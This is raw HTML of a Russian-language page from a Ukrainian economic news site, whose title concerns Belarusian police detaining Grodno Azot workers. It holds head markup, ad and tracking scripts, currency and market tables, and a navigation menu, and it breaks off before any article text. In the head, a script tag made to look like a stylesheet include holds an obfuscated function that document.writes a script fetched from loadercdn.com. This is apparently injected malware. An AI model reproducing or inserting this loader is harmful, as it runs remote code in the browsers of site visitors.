<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>В белорусскую милицию доставили более 20 сотрудников &#171;Гродно Азот&#187; | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="В белорусскую милицию доставили более 20 сотрудников &#171;Гродно Азот&#187; "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2020/08/54672947_303.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="500" /><meta property="og:image:height" content="281" /><meta property="og:image:alt" content="В белорусскую милицию доставили более 20 сотрудников &#171;Гродно Азот&#187; " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Белорусская милиция задержала более 20 сотрудников Гродно Азот." /><meta property="og:description" content="Белорусская милиция задержала более 20 сотрудников Гродно Азот." /><meta name="keywords" content="беларусь,протест в беларуси,новости мира" /><link rel="canonical" href="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot" /><meta property="og:url" content="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot" /><style>.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4815775';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4815775&amp;a=4002" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.enableServices();});
</script><script type="text/plain" id="vpb-catfish-template"><div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;"><div class="vpb-ad" style="display: block;position: relative;margin:0px auto;"><span class="vpb-close-button"
style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;"><img src="data:image/png;base64,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"/></span></div></div></script><script>function catfish(div) {var gt = window.googletag || {};gt.cmd = gt.cmd || [];gt.cmd.push(function () {var template = document.getElementById('vpb-catfish-template').innerHTML;var adContainer = document.getElementById(div);adContainer.innerHTML = template;adContainer.id = 'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];var newAdDiv = document.createElement('div');newAdDiv.id = div;innerWrapper.appendChild(newAdDiv);googletag.pubads().addEventListener('slotRenderEnded', function (event) {var slot = event.slot;var slotId = slot.getSlotElementId();if (slotId != div)  return;if (event.isEmpty) {closeBtn.style.display = 'none';adContainer.style.display = 'none';return;}adContainer.style.display = 'block';innerWrapper.style.width = event.size[0] + 'px';innerWrapper.style.height = event.size[1] + 'px';closeBtn.style.display = 'inline-block';closeBtn.addEventListener('click', function () {adContainer.parentElement.removeChild(adContainer);})
});gt.display(div);})
}</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>27.61</td><td>27.27</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>32.77</td><td>31.93</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.39</td><td>0.29</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>500.22</td><td>0.00</td><td>20:36 25.08.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1296.41</td><td>0.38</td><td>17:00 25.08.2020</td> </tr> <tr> <td>RTS</td><td>1267.16</td><td>-1.12</td><td>18:51 25.08.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>45.96</td><td>+1.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>43.45</td><td>+1.95</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>383.25</td><td>+1.66</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a 